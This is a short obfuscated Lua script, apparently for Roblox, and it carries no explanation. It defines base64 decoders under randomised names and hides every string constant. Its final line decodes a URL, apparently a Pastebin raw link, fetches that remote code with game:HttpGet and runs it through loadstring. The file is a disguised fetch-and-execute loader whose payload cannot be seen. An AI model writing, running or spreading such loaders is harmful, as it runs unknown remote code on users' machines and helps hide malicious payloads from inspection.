local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
function bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn(data) m=string.sub(data, 0, 55) data=data:gsub(m,'')

data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end


 


local b=bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('wWusbtZQnaEguxiJLqpBmNnjbzEYZbPasQAdwvdHYXYJSfPQAPPKGWKQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLw==')
function viGRYutTjWaiPNIbMhbLgsZRUhyUjWgwslRUoxLLaWZSedujhoBpFIUHjJsAjXjmfImoTQqBkCUG(data) m=string.sub(data, 0, 55) data=data:gsub(m,bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('YdNmSdpmTNnoMTVdVikzQgxXQfVvRepUWSQCqpoSHwRGZOLCzmntqoK'))

data = string.gsub(data, bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('bCiGtARqXZXCeFKmiaCoHOtNUxWMWEkdJkVRMwETxpmoVNuvTGSBbDdW14=')..b..bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('lrvrXLNQmYxDzKwipeDmQHMqcdSLJzgkfoOjCKhiaqnEeUZdVcMajcvPV0='), bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('DSegCanNaXNjGcbMfslzMIPibpAPjFAxzXinidhJFZkfBUPuGEWFMkQ')) return (data:gsub(bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('tgmTJeHHQuBRJJCfAhXmZoljTvBigGhwdlONthVzGvBuBavvtFdNqCELg=='), function(x) if (x == bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('cUbYbNpsBxJTxLOBUwCEsDvyoenZfgTimDcmoOelOTiSzAkpOmPsVyjPQ==')) then return bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('LCOAkoIwyYhkiGCdsjjySnKwNZgHDUjbqXvzOWsxAeaofKARyzrpRFZ') end local r,f=bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('ydeUnVoHbDjsIhHxSpmXhGulmrXERohuOVUFtbcroizbQGHUApxkthy'),(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('pYOSmIBkRAyereIJwGvaycrxZjUajpPdFiWuIMmNfNAMvKqJdRIgaNmMQ==') or bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('LkfILePNRzpdPGlZSjpxlfNxFfZMYmjjfDwvQrMPRJScFGzLwseDhGPMA==')) end return r; end):gsub(bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('gLdZrTIunDmFAohBeZyOKhpLcRGDlwmlAkkVfCzGbkQIoJtsSoHSTcSJWQlZCVkPyVkPyVkPyVkPyVkPyVkPw=='), function(x) if (#x ~= 8) then return bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('hhafGagaluVuTtfWLhkuBtbELtyASyAkkJcYfqEVlFeBZtwCyVKBxnQ') end local c=0 for i=1,8 do c=c+(x:sub(i,i)==bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('hQMFJZNnSGFBhyUPqZMmVLRPxHesIwhnjjsKwZVODldoyXRysQliuqTMQ==') and 2^(8-i) or 0) end return string.char(c) end)) end


 


loadstring(game:HttpGet(viGRYutTjWaiPNIbMhbLgsZRUhyUjWgwslRUoxLLaWZSedujhoBpFIUHjJsAjXjmfImoTQqBkCUG(bzVAZGJikSoyXAWVOiwqVaxGXeXJAezlONepRhjOIlRcuLvArOOoqPkDwXrdHktQguaoddigOsSpOAhbSmuDZsABBsJBwgQHZWn('GYjMyPLgLNgsZQCgIJdkCBqPrGzelmCjudzMABkVeaASICZbLBySBhwalFGTnJmUFJQWmpMVnpCem1XaHlxVU9Dc0JtR09ZckZqb2pzdE5qZ3VHeWpaU2dnU0VZbmNrVmFIUjBjSE02THk5d1lYTjBaV0pwYmk1amIyMHZjbUYzTDJ0TllXdEZhSGxX'))))()       
